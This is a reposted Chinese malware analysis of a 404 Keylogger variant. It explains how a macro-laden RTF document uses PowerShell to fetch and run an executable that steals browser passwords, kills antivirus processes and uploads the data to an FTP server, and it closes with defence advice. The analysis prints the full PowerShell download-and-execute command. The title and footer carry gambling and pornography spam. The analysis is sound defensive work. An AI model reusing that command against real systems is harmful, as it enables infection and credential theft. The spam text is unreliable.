安基網 首頁 資訊 安全報 查看內容

雪缘园彩票首页:404 Keylogger最新木馬,盜取受害者瀏覽器網站帳號和密碼

英超雪缘园 www.trual.com.cn 2019-12-30 17:44| 投稿: lofor |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 近日深信服安全團隊捕獲到一個最新的404 Keylogger木馬變種,通過OFFICE文檔嵌入惡意宏代碼進行傳播,盜取受害者瀏覽器的網站帳號和密碼,深信服安全團隊對此樣本進行了詳細分析,并獲取到了黑客FTP服務器的帳號和密 ...

近日深信服安全團隊捕獲到一個最新的404 Keylogger木馬變種,通過OFFICE文檔嵌入惡意宏代碼進行傳播,盜取受害者瀏覽器的網站帳號和密碼,深信服安全團隊對此樣本進行了詳細分析,并獲取到了黑客FTP服務器的帳號和密碼,請大家提高安全意識,不要輕易打開未知的郵件附件及文檔等。

樣本是一個RTF文檔,里面嵌套了OLE對象,包含惡意宏代碼,如下所示:

惡意宏代碼,會啟動PowerShell進程,從遠程服務器上下載惡意程序,然后執行,相關參數,如下:

powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”

分析下載的惡意程序,使用NET語言進行開發,首先會獲取遠程服務器地址:hxxps://paste.ee/r/RrkBF,如下所示:

讀取遠程服務器上的內容,如下所示:

直接加載執行遠程服務器上的腳本,如下所示:

解密去混淆遠程服務器上的腳本之后,同樣是一個NET編寫的程序,如下所示:

該程序主要功能是鍵盤記錄,盜取受害者瀏覽器網站上的帳號和密碼,會結束受害者主機上的瀏覽器相關進程,如下所示:

對抗殺軟,結束相關安全軟件進程,相關的安全軟件進程有一百多個,如下所示:

將記錄的瀏覽器上網站,以及相關的帳號和密碼,然后發送到黑客遠程FTPd服務器,如下所示:

該惡意程序還有截屏等操作,在分析該惡意程序的時候發現了黑客的FTP服務器地址,以及帳號和密碼,登錄進去,發現它已經盜取了部分受害者的主機信息,如下所示:

解決方案

病毒檢測查殺

1、深信服EDR產品、下一代防火墻及安全感知平臺等安全產品均具備病毒檢測能力,部署相關產品用戶可進行病毒檢測,如圖所示:

2、深信服為廣大用戶免費提供查殺工具,可下載如下工具,進行檢測查殺。

64位系統下載鏈接:

//edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系統下載鏈接:

//edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

病毒防御

1、及時給電腦打補丁,及時升級應用程序,修復漏洞。

2、不要點擊來源不明的郵件附件,不從不明網站下載軟件。

3、深信服防火墻客戶,建議升級到AF805版本,并開啟人工智能引擎Save,以達到最好的防御效果。

*本文作者:深信服千里目安全實驗室,轉載請注明來自FreeBuf.COM



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.freebuf.com/articles/system/222808.html

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao} 凯尔特人夺冠阵容 最新东京热快播 甘肃十一选五玩法 长春沐足店 排列三走势图坐标 快乐时时彩 scute 番号 山西天星麻将下载安装 快播中的日本av片 乌鲁木齐红灯区 手机看片1024 秘密行动 炒股投资 开拓者vs火箭赛程 天津11选5走势 秒速飞艇